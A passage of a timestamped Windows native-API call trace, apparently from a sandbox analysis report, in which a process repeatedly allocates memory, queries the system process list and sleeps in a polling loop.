BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.518] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.520] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.521] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.532] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.533] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.533] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.536] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.536] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.548] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.548] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.549] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.549] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.551] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.552] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.563] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.564] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.564] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.564] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.564] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.566] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.567] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.579] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.579] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.580] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.581] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.586] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.586] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.595] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.595] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.595] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.595] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.596] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.597] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.598] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.617] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.618] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.621] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.622] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.659] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.660] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.660] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.661] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.661] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.663] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.664] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.696] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.697] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.697] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.700] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.701] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.735] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.735] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.736] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.736] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.736] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.738] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.739] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.751] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.752] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.752] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.754] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.755] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.766] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.767] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.767] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.768] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.164] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.165] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.175] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.175] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.177] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.177] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.177] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.179] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.180] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.205] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.206] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.206] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.207] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.207] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.209] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.210] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.219] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.219] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.220] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.220] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.220] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.222] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.223] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.252] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.252] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.252] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.253] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.253] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.255] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.256] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.267] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.267] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.268] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.268] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.268] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.271] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.272] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.299] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.300] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.300] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.303] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.304] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.317] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.335] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.336] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.336] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.337] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.339] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.340] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.344] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.344] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.344] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.344] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.345] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.347] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.348] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.359] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.360] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.360] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.361] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.361] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.364] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.365] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.376] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.377] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.377] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.378] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.381] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, 